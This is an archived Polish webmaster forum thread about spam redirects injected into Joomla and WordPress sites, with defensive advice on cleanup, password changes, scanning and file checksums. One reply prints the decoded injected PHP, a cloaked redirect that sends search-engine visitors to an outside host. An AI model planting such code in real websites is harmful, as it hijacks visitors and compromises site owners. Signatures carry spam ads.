Skocz do zawartości

Spam na stronach (eval(base64_decode...)


Sanchez Spinoza

Rekomendowane odpowiedzi

Ja miałem to samo z Joomlą u Klienta. Każdy skrypt z otwartym kodem źródłowym jest narażony na takie numery, a jeszcze jak dodamy do tego "profesjonalne" podejście do bezpieczeństwa na różnych hostingach, to cud, że ten internet jeszcze nie pierdyknął.

- Reklama -

Podatki we Wrocławiu: biuro podatkowe wrocław

Miejscówa do parkowania przy Okęciu: parking okęcie

Odnośnik do komentarza
Udostępnij na innych stronach

ok, dzięki.

Wyczyszczę ile się da i zobaczę jak to pójdzie.

Jest może jakiś sposób abym dostawał maila za każdym razem jak "coś" (czytaj ruscy spamerzy) dopisze coś do pliku? Coś w co by globalnie obejmowało wszystkie podfoldery.

Profesjonalne publikacje Content Marketingowe - zamów online na BlackHood.pl 

Szeroki wybór Łożysk samochodowych

Polecam również Praca Bielsko

Odnośnik do komentarza
Udostępnij na innych stronach

a kod ktory ci wbijaja to:

error_reporting(0);

$qazplm=headers_sent();

if (!$qazplm){

$referer=$_SERVER['HTTP_REFERER'];

$uag=$_SERVER['HTTP_USER_AGENT'];

if ($uag) {

if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){

if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) {

if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){

header("Location: https://uendkgkw.ddns.me.uk/");

exit();

}

}

}

}

}

Portal MMORPG - Forum MMORPG

Największa społeczność graczy MMO. Wielki spis MMORPG.

Boty i hacki do gier MMORPG za free na forum

Odnośnik do komentarza
Udostępnij na innych stronach

Jest może jakiś sposób abym dostawał maila za każdym razem jak "coś" (czytaj ruscy spamerzy) dopisze coś do pliku?

Napisz skrypt, który będzie sprawdzał cyklicznie checksum'y plików.

Kody na tanie VPSy i hostingi SEO: 2KT7-JFNM-63E8 , EK6B-1JUJ-M9T6 , R3J5-RCNE-SPH4 , E8NR-U9N3-1TU7 , 3TEH-47B3-2HM6 = rabat 25%
Odnośnik do komentarza
Udostępnij na innych stronach

Nie jest to żadne przechwycenie haseł, jeśli by przechwycili dane do ftp to już dawno były by inne "problemy".

Tak jak pisza koledzy - masz nulledy szablony/dodatki i tyle, od tego zacznij.

Swoją drogą to ciesz się że masz tylko takie "oznaki", bo zdarzają się przypadki wyczyszczenia baz i podmiany własnych skryptów(możliwe że domyślne uprawnienia nie pozwalają).

SZUKASZ NAPRAWDĘ DOBRYCH I TANICH PROXY ?

Proxy w ilości 70 tys. wymieniane cyklicznie, stabilność anonimowość i nielimitowany transfer:

KLIKNIJ I KUP LUB PORÓWNAJ WSZYSTKIE RODZAJE PROXY

Odnośnik do komentarza
Udostępnij na innych stronach

To nie atakuje tylko Wordpressa. Wszystko zaatakowało.

1. Zmiana wszystkich haseł

2. Jeżeli korzystasz z programu do ftp typu FileZilla, total commander nigdy nie zapisuj w nim haseł.

3. Sprawdź dokładnie komputer z którego wysyłasz pliki na serwer pod kontem trojanów / wirusów.

4. Zeskanuj serwer ( https://sucuri.net/ )

5. Wyślij czysta kopie plików na serwer.

6. Sprawdź jak masz ustawione CHMOD - czyli uprawnienia do plików .

Powinno pomóc :)

Best military dog tags in the world.  :peace:

Odnośnik do komentarza
Udostępnij na innych stronach

To nie atakuje tylko Wordpressa. Wszystko zaatakowało.

Jasne ze wszystko zaatakuje, chyba po to się robi takie zabezpieczenia. Czy kradnąc komuś auto bierzesz pod uwagę że tam jest bomba ? Gdy bomba wybuchnie i rozp***ierniczy 5 domów to idziesz do właściciela tego auta po odszkodowanie ? Oczywiście że nie :D Więc nic nie możesz zrobić jeśli coś zaatakuje Ci wszystko co masz na danym hostingu.

Mało tego, niektóre "przerobione" wtyczki(dosyc popularne zresztą) mają opcje przekierowywania podstron na każdej ze stron która jest na hostingu(a nie tylko dla zainstalowanego skryptu). Nie przekierowują jednak zawsze, ale w przypadku konkretnych wejść, dlatego ustalenie o co chodzi jest po prostu trudne.

SZUKASZ NAPRAWDĘ DOBRYCH I TANICH PROXY ?

Proxy w ilości 70 tys. wymieniane cyklicznie, stabilność anonimowość i nielimitowany transfer:

KLIKNIJ I KUP LUB PORÓWNAJ WSZYSTKIE RODZAJE PROXY

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności